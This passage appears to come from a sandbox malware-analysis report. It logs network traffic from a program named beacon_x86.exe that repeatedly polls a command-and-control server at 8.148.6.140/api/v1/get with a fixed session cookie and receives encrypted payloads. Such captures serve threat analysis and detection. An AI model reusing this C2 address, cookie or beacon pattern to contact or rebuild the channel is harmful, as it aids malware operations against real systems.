        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:43.064197063 CET549INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:42 GMT
        Server: nginx
        Content-Length: 364
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 73 2b 63 78 59 44 5a 31 4e 56 4c 58 59 4d 55 71 59 2f 73 58 49 55 42 49 62 6f 33 4c 33 4f 33 62 37 5a 52 73 65 41 30 2b 4c 67 58 6a 76 64 65 37 62 5a 6d 63 33 6c 52 4d 4b 59 5a 38 6f 65 58 31 41 4f 7a 78 66 39 49 36 6e 73 2b 64 57 34 30 42 30 32 77 58 53 7a 67 6b 6e 33 6e 47 62 6f 48 36 65 4c 4a 64 79 57 4b 74 42 72 78 44 2f 45 57 75 4b 52 68 6c 74 71 32 50 50 68 4e 70 64 58 74 4b 68 68 54 4d 4a 58 71 78 57 79 64 43 4b 58 30 63 48 33 67 79 2f 61 77 2b 47 53 32 79 2b 64 65 4b 41 38 64 4a 75 33 59 61 41 71 63 59 6c 63 65 43 6b 71 37 4e 4e 48 68 35 68 53 4e 54 5a 49 2b 51 76 4a 37 59 67 42 41 32 4c 64 39 66 64 44 6a 79 63 62 71 47 4f 50 30 4f 46 47 75 66 67 49 72 6b 49 50 4f 4c 4b 55 6e 73 30 57 55 6e 51 52 6f 32 5a 64 5a 4f 36 47 49 46 4c 7a 56 55 53 41 56 70 39 53 48 49 50 55 42 72 54 48 75 62 7a 7a 6c 33 57 52 6c 72 49 37 75 44 68 70 32 58 46 53 62 4c 53 2b 43 66 56 44 4f 75 76 6e 41 6e 4d 50 34 53 74 42 56 4e 6a 42 39 48 6e 63 50 53 6b 74 37 78 2f 4e 2f 65 38 39 51 64 49 64 4c 52 61 37 37 68 62 64 [TRUNCATED]
        Data Ascii: s+cxYDZ1NVLXYMUqY/sXIUBIbo3L3O3b7ZRseA0+LgXjvde7bZmc3lRMKYZ8oeX1AOzxf9I6ns+dW40B02wXSzgkn3nGboH6eLJdyWKtBrxD/EWuKRhltq2PPhNpdXtKhhTMJXqxWydCKX0cH3gy/aw+GS2y+deKA8dJu3YaAqcYlceCkq7NNHh5hSNTZI+QvJ7YgBA2Ld9fdDjycbqGOP0OFGufgIrkIPOLKUns0WUnQRo2ZdZO6GIFLzVUSAVp9SHIPUBrTHubzzl3WRlrI7uDhp2XFSbLS+CfVDOuvnAnMP4StBVNjB9HncPSkt7x/N/e89QdIdLRa77hbdlbskOpUAboAL/juK/DcLuNomI=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        120192.168.2.8498308.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:43.186630011 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:44.147357941 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:43 GMT
        Server: nginx
        Content-Length: 300
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:29:44.147422075 CET300INData Raw: 2f 31 4e 53 34 63 55 71 51 42 52 66 58 64 53 4b 4d 6e 75 4d 65 76 35 51 74 2b 43 48 6b 34 74 44 52 48 53 55 34 77 4c 56 62 77 6a 77 67 39 4e 30 71 6f 37 66 31 6e 4b 31 61 33 6c 4c 5a 79 6a 6b 53 4b 30 75 59 4f 46 74 6d 67 48 4d 6d 75 6d 46 51 35
        Data Ascii: /1NS4cUqQBRfXdSKMnuMev5Qt+CHk4tDRHSU4wLVbwjwg9N0qo7f1nK1a3lLZyjkSK0uYOFtmgHMmumFQ5vySYNR+SBd6FUa+pphVNhkFvXPDWhKDprxPJMxfRlI+Wr61yuPymfCjk1NyCRdozv3GnW2WBESwAjpISpP5g1giwKy7u1W2tFZYHmdNSuGaEsP3uoZBI/uLhpNRqctpiy5CU5tjIwrEIzZgTxkPwAoJupmW/ZdHPb


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        121192.168.2.8498318.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:44.264313936 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:45.863683939 CET293INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:45 GMT
        Server: nginx
        Content-Length: 108
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 69 61 47 31 79 37 70 66 52 50 57 64 43 48 7a 77 34 68 48 53 6b 4d 50 6b 4d 44 71 38 58 45 67 6f 70 57 4b 4f 61 6b 42 49 75 50 4b 39 74 67 4a 6c 35 75 33 67 47 6d 58 33 34 2f 6f 45 58 30 79 75 52 50 4a 73 36 55 53 73 62 49 66 44 6f 68 56 62 48 6e 6e 2b 6a 73 53 65 54 75 38 6c 52 76 59 35 4e 37 37 49 2f 74 33 61 32 77 45 3d
        Data Ascii: iaG1y7pfRPWdCHzw4hHSkMPkMDq8XEgopWKOakBIuPK9tgJl5u3gGmX34/oEX0yuRPJs6USsbIfDohVbHnn+jsSeTu8lRvY5N77I/t3a2wE=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        122192.168.2.8498328.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:46.122823000 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:47.095360041 CET377INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:46 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 63 2f 56 64 56 2b 61 31 6d 67 46 44 69 43 33 38 6e 57 6a 46 64 4a 37 4b 30 73 56 76 34 6b 72 68 6b 37 74 75 45 39 50 54 55 32 76 6e 43 73 44 53 2b 59 76 7a 4e 70 32 59 6b 6f 33 56 5a 64 45 6b 4b 55 5a 6d 44 46 6b 4d 32 51 4b 6d 75 75 48 41 33 4d 30 74 74 74 35 34 2b 55 71 49 44 70 6a 65 65 6e 5a 6e 48 50 57 47 67 42 68 50 77 35 4c 76 52 2b 51 71 58 4f 36 54 49 61 30 2b 59 46 66 48 53 50 35 66 5a 58 75 77 75 4d 46 6d 58 5a 71 72 54 31 6f 56 61 66 30 42 72 77 56 36 39 63 76 79 38 51 67 63 50 6e 45 50 45 75 47 42 58 4b 62 2f 6e 51 41 75 35 35 74 51 68 44 73 6f 2b 57 70 7a
        Data Ascii: c/VdV+a1mgFDiC38nWjFdJ7K0sVv4krhk7tuE9PTU2vnCsDS+YvzNp2Yko3VZdEkKUZmDFkM2QKmuuHA3M0ttt54+UqIDpjeenZnHPWGgBhPw5LvR+QqXO6TIa0+YFfHSP5fZXuwuMFmXZqrT1oVaf0BrwV69cvy8QgcPnEPEuGBXKb/nQAu55tQhDso+Wpz


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        123192.168.2.8498338.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:47.217442036 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:51.199580908 CET357INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:51 GMT
        Server: nginx
        Content-Length: 172
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 4d 67 37 6f 59 67 52 75 34 53 33 55 69 5a 4a 77 34 34 6b 7a 42 4c 35 51 33 6b 33 51 51 51 70 70 32 34 54 34 37 36 33 37 71 6e 74 31 42 52 59 2f 33 72 61 33 32 46 37 36 4b 37 68 66 37 62 75 36 72 46 63 76 68 64 50 4d 54 75 69 66 54 2f 44 69 5a 2f 33 39 45 76 62 59 42 38 75 75 61 30 6e 44 58 31 41 52 75 43 70 59 64 76 4a 55 6c 47 2f 66 4b 6a 68 36 33 67 43 71 6e 64 58 67 5a 71 52 65 68 36 6f 38 7a 72 65 67 6d 77 4b 4a 73 54 76 32 65 5a 57 32 65 2f 39 32 33 4e 62 59 69 77 67 51 68 36 6a 33 51 6f 70 59 49 30 55 3d
        Data Ascii: Mg7oYgRu4S3UiZJw44kzBL5Q3k3QQQpp24T47637qnt1BRY/3ra32F76K7hf7bu6rFcvhdPMTuifT/DiZ/39EvbYB8uua0nDX1ARuCpYdvJUlG/fKjh63gCqndXgZqReh6o8zregmwKJsTv2eZW2e/923NbYiwgQh6j3QopYI0U=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        124192.168.2.8498348.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:51.310986042 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        125192.168.2.8498358.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:55.475022078 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:59.447546959 CET377INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:59 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 53 6d 66 30 46 71 7a 64 74 46 4e 33 58 30 61 43 45 53 61 7a 45 36 75 35 4c 32 34 61 63 39 4e 63 4c 75 47 74 56 6d 51 71 71 54 75 72 51 77 4c 4c 4d 56 61 42 37 57 6a 35 4f 49 31 6b 51 69 72 76 66 76 6f 71 37 34 48 51 54 39 78 46 61 36 34 34 5a 4c 6f 78 35 38 44 70 4d 6d 30 75 41 6e 73 7a 6a 54 2f 31 5a 50 73 76 6f 39 62 38 76 59 4c 4c 52 45 39 69 31 6d 59 77 4d 36 34 55 56 77 53 48 44 79 50 51 47 6d 48 44 2f 4c 35 42 74 42 71 31 6d 6b 42 6f 63 62 71 47 48 7a 43 50 44 6b 6e 50 73 6e 4f 45 36 62 74 78 70 34 33 63 73 68 62 75 42 6b 45 76 35 76 4f 42 35 5a 7a 4a 69 32 54 55
        Data Ascii: Smf0FqzdtFN3X0aCESazE6u5L24ac9NcLuGtVmQqqTurQwLLMVaB7Wj5OI1kQirvfvoq74HQT9xFa644ZLox58DpMm0uAnszjT/1ZPsvo9b8vYLLRE9i1mYwM64UVwSHDyPQGmHD/L5BtBq1mkBocbqGHzCPDknPsnOE6btxp43cshbuBkEv5vOB5ZzJi2TU


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        126192.168.2.8498368.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:59.562051058 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:30:01.140414000 CET337INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:30:00 GMT
        Server: nginx
        Content-Length: 152
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 2b 46 70 77 30 4f 79 6d 34 46 42 67 77 64 38 4f 4f 6e 71 65 63 77 6c 66 63 31 77 4e 69 41 4c 76 63 73 64 77 55 63 58 37 52 59 31 64 43 78 69 67 65 68 46 46 79 43 57 6c 71 31 49 35 53 78 59 32 4d 4f 63 33 31 55 54 61 62 54 76 6b 4d 53 36 61 64 55 4b 77 4f 35 6e 43 59 4c 62 73 41 61 4b 7a 68 59 71 69 45 77 4b 75 52 53 72 53 7a 62 34 30 6f 43 79 32 4a 4b 2b 76 59 53 7a 64 4b 51 69 61 56 64 64 57 59 36 6a 41 44 78 6f 53 64 70 66 6e 53 67 39 4f 36 77 3d 3d
        Data Ascii: +Fpw0Oym4FBgwd8OOnqecwlfc1wNiALvcsdwUcX7RY1dCxigehFFyCWlq1I5SxY2MOc31UTabTvkMS6adUKwO5nCYLbsAaKzhYqiEwKuRSrSzb40oCy2JK+vYSzdKQiaVddWY6jADxoSdpfnSg9O6w==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        127192.168.2.8498378.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:30:01.265882015 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        128192.168.2.8498388.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:30:05.393604040 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        129192.168.2.8498398.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:30:09.653590918 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:30:10.625997066 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:30:10 GMT
        Server: nginx
        Content-Length: 172
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:30:10.626405954 CET172INData Raw: 7a 36 34 70 33 30 53 69 31 6d 7a 54 38 6a 43 4a 62 4b 61 36 74 34 6a 7a 44 76 52 68 45 52 44 58 68 36 48 46 49 78 77 44 6c 45 75 72 69 6d 35 46 55 73 4d 45 48 73 79 54 6f 78 47 51 6c 4d 4a 75 73 74 6f 32 50 6e 76 78 6a 66 75 51 5a 79 77 4d 6d 74
        Data Ascii: z64p30Si1mzT8jCJbKa6t4jzDvRhERDXh6HFIxwDlEurim5FUsMEHsyToxGQlMJusto2PnvxjfuQZywMmtAOIwaTZWsZn7+223cQFCE8KN6knAvKvmr/UTTRsbx5TfHJntBEW0LOmLOGUMACbu2H4C/0xg2g5XMHRmMxtNA63PA=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        130192.168.2.8498408.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:30:10.751080036 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:30:11.767172098 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:30:11 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 51 6d 4a 57 68 79 72 30 71 2b 31 4a 2f 39 4b 4c 37 50 63 59 55 49 70 41 34 30 38 6d 71 46 6f 4d 70 52 49 4f 38 43 73 48 38 39 68 4b 4c 6e 52 38 53 61 34 70 47 74 2f 44 4c 53 37 57 56 51 48 73 6b 72 77 31 6a 6e 6f 4f 76 48 78 4b 71 43 73 49 7a 51 41 73 56 66 53 55 57 38 4e 65 76 57 34 38 59 47 61 5a 75 54 6b 35 4e 48 6d 62 49 7a 67 35 6d 53 4f 45 2f 44 43 31 41 7a 53 77 7a 42 56 6f 78 6a 41 62 58 77 48 72 62 6c 68 65 33 70 36 30 62 4f 69 53 35 4a 42 71 68 6d 65 7a 4d 6e 47 56 70 67 54 66 36 6f 69 7a 39 57 79 43 57 5a 42 74 57 78 57 42 6c 2f 38 4f 53 34 62 59 6b 57 37 47 45 69 4c 75 64 6c 73 58 43 51 6c 61 69 5a 37 68 66 33 41 59 6a 62 7a 6f 57 55 2f 74 65 76 45 45 31 44 4a 4d 54 2b 47 6c 46 44 73 59 61 2f 36 64 59 73 68 4b 73 78 71 79 52 4d 2b 30 61 6d 39 33
        Data Ascii: QmJWhyr0q+1J/9KL7PcYUIpA408mqFoMpRIO8CsH89hKLnR8Sa4pGt/DLS7WVQHskrw1jnoOvHxKqCsIzQAsVfSUW8NevW48YGaZuTk5NHmbIzg5mSOE/DC1AzSwzBVoxjAbXwHrblhe3p60bOiS5JBqhmezMnGVpgTf6oiz9WyCWZBtWxWBl/8OS4bYkW7GEiLudlsXCQlaiZ7hf3AYjbzoWU/tevEE1DJMT+GlFDsYa/6dYshKsxqyRM+0am93


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        131192.168.2.8498418.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:30:11.890676022 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:30:12.876468897 CET421INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:30:12 GMT
        Server: nginx
        Content-Length: 236
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 43 2b 64 6c 74 75 45 48 67 68 53 62 57 34 38 74 6a 44 6e 68 50 78 2b 6b 7a 61 51 73 67 31 62 73 6a 79 6a 6f 36 2f 56 47 56 44 39 6a 30 57 67 75 6d 65 42 68 4e 36 37 30 44 5a 64 54 4e 4e 36 38 35 59 37 41 55 71 52 67 50 5a 4c 79 35 35 76 52 30 46 41 48 6c 64 56 68 4e 62 68 6f 72 79 63 44 45 37 72 66 4d 47 54 46 49 48 56 43 59 39 35 74 52 36 62 59 35 48 43 31 50 54 4f 6c 76 74 54 37 41 46 4d 57 51 4f 5a 64 6e 59 32 57 53 35 6f 49 39 6a 7a 61 66 62 2f 57 4d 74 4f 33 78 78 50 58 77 6e 69 4a 70 5a 2b 6e 5a 58 7a 72 36 65 46 72 31 59 49 37 39 77 53 62 30 2b 64 34 4d 6e 7a 4b 32 52 6d 55 47 63 4d 30 39 6e 35 2b 64 66 76 4c 61 41 4f 79 62 67 43 79 6d 2b 6c 52 54 74 7a 56 64 55 2f 68 61 35 54 54 6d 43 34 3d
        Data Ascii: C+dltuEHghSbW48tjDnhPx+kzaQsg1bsjyjo6/VGVD9j0WgumeBhN670DZdTNN685Y7AUqRgPZLy55vR0FAHldVhNbhorycDE7rfMGTFIHVCY95tR6bY5HC1PTOlvtT7AFMWQOZdnY2WS5oI9jzafb/WMtO3xxPXwniJpZ+nZXzr6eFr1YI79wSb0+d4MnzK2RmUGcM09n5+dfvLaAOybgCym+lRTtzVdU/ha5TTmC4=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        132192.168.2.8498428.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:30:13.001436949 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:30:13.970474958 CET293INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:30:13 GMT
        Server: nginx
        Content-Length: 108
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 43 57 66 37 6c 6b 6d 34 63 63 64 78 41 75 77 46 62 4f 38 61 2f 4e 50 68 64 4a 67 30 4c 39 76 2b 42 39 4e 66 4f 63 57 53 62 76 39 4d 41 62 51 71 4e 52 55 31 5a 56 50 77 38 6d 76 61 74 47 2f 41 39 7a 79 48 71 4a 45 74 57 41 6b 32 79 42 52 35 30 4a 68 48 45 6f 56 43 31 2f 61 74 6c 33 51 71 67 67 64 38 30 61 39 30 42 30 30 3d
